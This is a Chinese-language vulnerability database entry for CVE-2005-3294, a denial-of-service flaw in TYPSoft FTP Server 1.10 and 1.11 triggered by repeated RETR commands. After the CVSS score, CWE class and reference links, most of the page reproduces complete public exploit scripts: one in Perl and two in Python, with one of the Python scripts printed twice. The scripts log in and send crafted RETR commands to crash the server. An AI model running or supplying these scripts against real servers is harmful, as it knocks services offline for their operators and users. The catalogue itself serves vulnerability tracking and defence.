CVE-2005-3294
CVSS5.0
发布时间 :2005-10-23 17:02:00
修订时间 :2011-01-26 00:00:00
NMCOEP    

[原文]Typsoft FTP Server 1.11, with "Sub Directory Include" enabled, allows remote attackers to cause a denial of service (crash) by sending multiple RETR commands. NOTE: it was later reported that 1.10 is also affected.


[CNNVD]TYPSoft FTP Server RETR拒绝服务漏洞(CNNVD-200510-177)

        Typsoft FTP Server s是一款FTP软件。
        Typsoft FTP Server 1.11在启用“Sub Directory Include”时,存在拒绝服务漏洞。远程攻击者可通过发送多个RETR命令,导致拒绝服务(崩溃)。

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: NONE [对系统的机密性无影响]
完整性影响: NONE [不会对系统完整性产生影响]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CWE (弱点类目)

CWE-399 [资源管理错误]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3294
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-3294
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200510-177
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/15104
(UNKNOWN)  BID  15104
http://www.osvdb.org/19992
(UNKNOWN)  OSVDB  19992
http://www.exploitlabs.com/files/advisories/EXPL-A-2005-016-typsoft-ftpd.txt
(VENDOR_ADVISORY)  MISC  http://www.exploitlabs.com/files/advisories/EXPL-A-2005-016-typsoft-ftpd.txt
http://www.exploit-db.com/exploits/15860
(UNKNOWN)  EXPLOIT-DB  15860
http://secunia.com/advisories/17196
(VENDOR_ADVISORY)  SECUNIA  17196

- 漏洞信息

TYPSoft FTP Server RETR拒绝服务漏洞
中危 其他
2005-10-23 00:00:00 2005-10-24 00:00:00
远程  
        Typsoft FTP Server s是一款FTP软件。
        Typsoft FTP Server 1.11在启用“Sub Directory Include”时,存在拒绝服务漏洞。远程攻击者可通过发送多个RETR命令,导致拒绝服务(崩溃)。

- 公告与补丁

        暂无数据

- 漏洞信息 (1251)

TYPSoft FTP Server <= 1.11 (RETR) Denial of Service Vulnerability (EDBID:1251)
windows dos
2005-10-14 Verified
0 wood
N/A [点击下载]
#!/usr/bin/perl

use IO::Socket;
use Socket;

print "\n-= TYPSoft FTP Server <= v1.11 DOS =-\n";
print "-= wood (at) Exploitlabs.com =-\n\n";

if($#ARGV < 2 | $#ARGV > 3) { die "usage: perl typsoft-1.11-DOS.pl <host> <user> <pass> [port]\n" };
if($#ARGV > 2) { $prt = $ARGV[3] } else { $prt = "21" };

$adr = $ARGV[0];
$usr = $ARGV[1];
$pas = $ARGV[2];
$err1 = "RETR 0";
$err2 = "RETR 1";


$remote = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$adr,
PeerPort=>$prt, Reuse=>1) or die "Error: cant connect to $adr:$prt\n";

$remote->autoflush(1);

print $remote "USER $usr\n" and print "1. Sending : USER $usr...\n" or die
"Error: cant send user\n";

print $remote "PASS $pas\n" and print "2. Sending : PASS $pas...\n" or die
"Error: cant send pass\n";

print $remote "$err1/\n" and print "3. Sending : ErrorCode 1...\n";
print $remote "$err2/\n" and print "4. Sending : ErrorCode 2...\n\n"or die 
"Error: cant send error code\n";

print "Attack done. press any key to exit\n";
$bla= <STDIN>;
close $remote; 

# milw0rm.com [2005-10-14]
		

- 漏洞信息 (12604)

TYPSoft FTP Server v1.10 RETR Command DoS (EDBID:12604)
windows dos
2010-05-14 Verified
0 Jeremiah Talamantes
[点击下载] [点击下载]
# Tested on: Windows XP, SP2 (EN)

#!/usr/bin/python
print "\n#################################################################"
print "##                      RedTeam Security                       ##"
print "##             TYPSoft FTP Server RETR Command DoS             ##"
print "##                        Version 1.10                         ##"
print "##                                                             ##"
print "##                     Jeremiah Talamantes                     ##"
print "##                   labs@redteamsecure.com                    ##"
print "################################################################# \n"

import socket
import sys

# Description:
# RETR command overflow with no PORT specified

# Define the exploit's usage
def Usage():
    print ("Usage: scriptname.py <IP> <username> <password>\n")
    print ("\n\nCredit: Jeremiah Talamantes")
    print ("RedTeam Security : www.redteamsecure.com/labs\n")

# Buffer
buffer="AAAA" * 496

def exploit(hostname,username,password):
	i=0
	while i < 10:
		i=i+1
		sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
		try:
			sock.connect((hostname, 21))
		except:
			print ("Error: unable to connect to host")
			sys.exit(1)
		r=sock.recv(1024)
		print "[+] " + r + ": iteration number:  ",i
		sock.send("USER " + username + "\r\n")
		r=sock.recv(1024)
		sock.send("PASS " + password + "\r\n")
		r=sock.recv(1024)
		sock.send("RETR " + buffer + "\r\n")
		sock.close()
		
if len(sys.argv) <> 4:
    Usage()
    sys.exit(1)
else:
    hostname=sys.argv[1]
    username=sys.argv[2]
    password=sys.argv[3]
    exploit(hostname,username,password)
    sys.exit(0)

# End
		

- 漏洞信息 (15860)

TYPSoft FTP Server (v 1.10) RETR CMD Denial Of Service (EDBID:15860)
windows dos
2010-12-29 Verified
0 emgent
[点击下载] [点击下载]
#!/usr/bin/python
#
# TYPSoft FTP Server (v 1.10) RETR CMD Denial Of Service
#
# CVE-2005-3294
# OSVDB 19992
#
# 12/23/2010
# (C) Emanuele Gentili <emgent@backtrack-linux.org>
#
# Notes:
# I have wrote this exploit because the code published here (1) do not work correctly.
# (1) http://www.exploit-db.com/exploits/12604/
#

import socket
import sys

user="test"
pwd="test"
buffer="\x41"

print("\n TYPSoft FTP Server (V 1.10) RETR CMD Denial Of Service\n")
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("192.168.0.109",21))
data = s.recv(1024)
print("[+] Sending user login...")
s.send("USER " + user + '\r\n')
data = s.recv(1024)
s.send("PASS " + pwd + '\r\n')
data = s.recv(1024)
print("[+] Sending first exploit stage...")
s.send("RETR " + buffer + '\r\n')
data = s.recv(1024)
print("[+] Sending second exploit stage...\n")
s.send("RETR " + buffer + '\r\n')
data = s.recv(1024)
s.close()
		

- 漏洞信息 (F97139)

TYPSoft FTP Server 1.10 Denial Of Service (PacketStormID:F97139)
2010-12-29 00:00:00
Emanuele Gentili  
exploit,denial of service
CVE-2005-3294,OSVDB-19992
[点击下载]

TYPSoft FTP Server version 1.10 RETR CMD denial of service exploit.

#!/usr/bin/python
#
# TYPSoft FTP Server (v 1.10) RETR CMD Denial Of Service
#
# CVE-2005-3294
# OSVDB 19992
#
# 12/23/2010
# (C) Emanuele Gentili <emgent@backtrack-linux.org>
#
# Notes:
# I have wrote this exploit because the code published here (1) do not work correctly.
# (1) http://www.exploit-db.com/exploits/12604/
#
 
import socket
import sys
 
user="test"
pwd="test"
buffer="\x41"
 
print("\n TYPSoft FTP Server (V 1.10) RETR CMD Denial Of Service\n")
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("192.168.0.109",21))
data = s.recv(1024)
print("[+] Sending user login...")
s.send("USER " + user + '\r\n')
data = s.recv(1024)
s.send("PASS " + pwd + '\r\n')
data = s.recv(1024)
print("[+] Sending first exploit stage...")
s.send("RETR " + buffer + '\r\n')
data = s.recv(1024)
print("[+] Sending second exploit stage...\n")
s.send("RETR " + buffer + '\r\n')
data = s.recv(1024)
s.close()

    

- 漏洞信息

19992
TYPSoft FTP Server Crafted RETR Command DoS
Denial of Service
Loss of Availability
Exploit Public

- 漏洞描述

- 时间线

2005-10-13 Unknow
2005-10-13 Unknow

- 解决方案

Products

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站